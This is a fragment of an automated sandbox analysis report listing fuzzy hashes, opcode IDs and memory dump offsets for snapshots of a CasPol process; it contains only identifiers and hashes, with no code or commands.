                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 38cc5bb741a047fd230f3e6535c6ea04403cc6d034cb82ce04fb6a1546138ad0
                                                                                                                                                                                                                                                    • Instruction ID: dde72c9c98710ea36ff1c8e620f594247687d1b0e9fb77df4734d6b8a9d1ac87
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38cc5bb741a047fd230f3e6535c6ea04403cc6d034cb82ce04fb6a1546138ad0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67316030E20619CBDB19DF69D89469EBBB2FF89300F508519E80AE7340DB71AD42CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 40d9b31b0a28366cc18f07a21f5ebfcaa2697a6f1f6c675d974a36cbc7b94cd1
                                                                                                                                                                                                                                                    • Instruction ID: 97d8bb58e80b539cd42ea88738f53b242959d2acb52a59c81a9b45dd3a59c602
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40d9b31b0a28366cc18f07a21f5ebfcaa2697a6f1f6c675d974a36cbc7b94cd1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A314330E10619DBDB19DF69D89469EBBF6EF89300F508519E816E7340EB71AD41CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4809294bbce5ef1928421a0485a137128b15cfbebba67819890b37aec2a7744b
• Instruction ID: 3047a1f16c23fe477a52dfe78e192006d83c05929a9c8290492d32ebecc96bda
• Opcode Fuzzy Hash: 4809294bbce5ef1928421a0485a137128b15cfbebba67819890b37aec2a7744b
• Instruction Fuzzy Hash: 4D21A975F546158FDB45DFBAE880AAEBBF1EB4C310F148069E905E7391EB34E8018B90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12e4c1bef53e2564065d845e07f75dee054a8150d2e908a836c67ab4f93c78b5
• Instruction ID: 3e3591a0eb6976225e494caaa97e034d3b240434b8c691e6773a9b4cffd449f6
• Opcode Fuzzy Hash: 12e4c1bef53e2564065d845e07f75dee054a8150d2e908a836c67ab4f93c78b5
• Instruction Fuzzy Hash: 0F215775F106199FDB44DF6AE880AAEBBF1FB48340F108069E905E7381EB34EC008B90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2515260188.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_136d000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57674aec5da1d349907f4d199d8e0360db5517bee7f17845fdc8316d78623ccf
• Instruction ID: a77fa71e8add9b13e6df6158c90337ea099c67a3ebb1b44a374e89610f95bb1d
• Opcode Fuzzy Hash: 57674aec5da1d349907f4d199d8e0360db5517bee7f17845fdc8316d78623ccf
• Instruction Fuzzy Hash: A42146B1604304DFDB15DF54D9C0B26BBA9FB84318F24C56DD88A4B24AC37BD847CA62
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b1b5aef631a1876cff1551300d07ecee96c49eab83cbbc642ad1c0c6742cd2ca
• Instruction ID: 8241d09d3eec4f89757669c948ff16087742d69ac1fc9e957295742361e3eb04
• Opcode Fuzzy Hash: b1b5aef631a1876cff1551300d07ecee96c49eab83cbbc642ad1c0c6742cd2ca
• Instruction Fuzzy Hash: 2C217530B21119DFDF58EA6DE4546ADB7A7EB85310F248425D805D7340DB35AC818B94
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf8a010e506ec6e8b647c60e6bf6d32cb5ad0de1559ff498b7ee5f53f5f75b8c
• Instruction ID: 8bbbb74ebd6e2337c8b362987def3296c921ac244ec85759608c767fd44fb7ae
• Opcode Fuzzy Hash: bf8a010e506ec6e8b647c60e6bf6d32cb5ad0de1559ff498b7ee5f53f5f75b8c
• Instruction Fuzzy Hash: 3B11D071A107058FCB25DFB5CCC0AAFFBB6FF88200B144929E595E7650D770A855CBA0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 511322398255f36dde39852911aaf3f6fe224f73461a031601af1affc83c52a2
• Instruction ID: 62a243416ce47b6dc8aefe74d2e2cc7888b51ee5c043503485df0c7a002a6757
• Opcode Fuzzy Hash: 511322398255f36dde39852911aaf3f6fe224f73461a031601af1affc83c52a2
• Instruction Fuzzy Hash: 07118236B205298FCF58E67ED8146AEB7E6FBC8350B108039D805E7340DE659C0287D0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63dadd0148831ace0b87b6f351dab4167f2cab17fc07ec12d4b296843d65be3f
• Instruction ID: 6aab94cae74a45f72a59c88dc8ddead69cfb5ac6ab5c88638db79085c5687abf
• Opcode Fuzzy Hash: 63dadd0148831ace0b87b6f351dab4167f2cab17fc07ec12d4b296843d65be3f
• Instruction Fuzzy Hash: D4014C30B641620FD79AA63CD8547AE7BE6EB8A710F04886DF50ACB355EE15CC428394
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b250f0aad35646bd3c97e79064767b43f300bf552443235d298d64fc55b671c3
• Instruction ID: 17f7a8983aecc18dc32400f4f7f380f08065fb1fab36b8ac464d5ed1e72f0bad
• Opcode Fuzzy Hash: b250f0aad35646bd3c97e79064767b43f300bf552443235d298d64fc55b671c3
• Instruction Fuzzy Hash: 7E21F2B5D01219AFDB10DF9AD884BDEFBB4FB48314F10852AE918A7310C375AA45CFA4
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2515260188.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_136d000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
• Instruction ID: 7b1e5ee5343ad4b62c2c75c45728189d1ebbe89a00915693ec266b95a38ef101
• Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
• Instruction Fuzzy Hash: E511BB75604280CFDB12CF54D9C0B15BBB1FB84318F28C6AAD8894B65BC33AD44ACB62
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 531f11a04467658fb0a6ce946daa4409e848136b72baf01ee973d26f0f735978
                                                                                                                                                                                                                                                    • Instruction ID: ca0bd16dfe602d02bb6bc21fb4679e47dcf6778bb6e9028a6ecf8e787512ee6c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 531f11a04467658fb0a6ce946daa4409e848136b72baf01ee973d26f0f735978
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34016171E102299FDB58EB7AC8405DEF7B5EB89310F10856AD906EB240DA31D941CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: df872fde4b9931b955d5030f224dadefb57a41480094d4759b598cfaafc0d4c8
                                                                                                                                                                                                                                                    • Instruction ID: bd8780c882df30840d43d7ca300d949402b9a7525e83133e5ce8d3b7b5f572ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df872fde4b9931b955d5030f224dadefb57a41480094d4759b598cfaafc0d4c8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A611D0B5D01259AFCB10DF9AD884BDEFBB4FB48314F10812AE918A7310C375A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9254ab94591e461f21a824064cbf70d3a7690a1351f1b29be08ec449067f4457
                                                                                                                                                                                                                                                    • Instruction ID: e657c0937e01ef4be453b01bcd48a61436d944f57536e9d3507269b81a99069a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9254ab94591e461f21a824064cbf70d3a7690a1351f1b29be08ec449067f4457
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501D130B202210BDB69E56ED494B2FB7DBDFC9B20F108439E90AC7380DE61DC424395
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1f36f7d0330896cd9a8c3437f3500f842ce4b3c8d6c52531ba0cb221514b9182
                                                                                                                                                                                                                                                    • Instruction ID: 424468b681c73f5dd31b71263a73be6ca0dd033214e5e2f3c5d60e927bd8af35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f36f7d0330896cd9a8c3437f3500f842ce4b3c8d6c52531ba0cb221514b9182
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401B536B206244FDB69D67DD8243BE77EAAB88310F04413AD906E7344DE659C028790
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3072915a7d81703e3cdd939a1c2178b8043b3b52d9785c5f2cc9f4f150dcb014
                                                                                                                                                                                                                                                    • Instruction ID: ee1acd66f09c2408106a2cbe3a130a1975c6ff11a096c595044c39b67de5f14e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3072915a7d81703e3cdd939a1c2178b8043b3b52d9785c5f2cc9f4f150dcb014
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001A430B602250FDB95EA2DE454B6E7BDAE78A750F108838E90AC7354EE65DC4287D4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1ef5631a29894166ff7899b36145d3208fa1d30af46f100cfb96cd3a278d3980
                                                                                                                                                                                                                                                    • Instruction ID: 1fcb53517fa85e2d5e314c2e673a0cf9be06bcdb2522d6e20d9639ff19a9835d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ef5631a29894166ff7899b36145d3208fa1d30af46f100cfb96cd3a278d3980
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0A732F31228ABDB186969E8055EAB77AE784354F004429EE01A7340DA726C1087C0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5fff228ee20ac56fb185fc2bd62cbcba93c6c8d40236aec3a0a38f13bc079c88
                                                                                                                                                                                                                                                    • Instruction ID: a4ce70281ae086be5d1e3eb5cf25a5f4f6adc312f46643b6747e4982e015750e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fff228ee20ac56fb185fc2bd62cbcba93c6c8d40236aec3a0a38f13bc079c88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0657096A2855ADF61EAB4CA5579A7BA4EB03204F2448D6D804CB142D236D9058341
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 458e4c3f970d1770dabaaee4c4ec6d80cfa60b2cbcb86bb557e3fd4901abae2d
• Instruction ID: c9ee0bc3febfbc47e01de1efe4a8a910391d824e47ab2df5855095f3e3335ab7
• Opcode Fuzzy Hash: 458e4c3f970d1770dabaaee4c4ec6d80cfa60b2cbcb86bb557e3fd4901abae2d
• Instruction Fuzzy Hash: 61F0FE31A24129DFDB54EF94E869BADBBB2FF48705F200129E402A7384CB741D41CB85
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
• Instruction ID: 731d101470b4df46afbf5d2cf05787efec4c6b8d4288d58de5eccb92a98f92b2
• Opcode Fuzzy Hash: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
• Instruction Fuzzy Hash: 7BE0C270E20209ABDF60EEB0CA0575AB3ADE702244F2088A5DC08C7201E272DA058380
Uniqueness

Uniqueness Score: -1.00%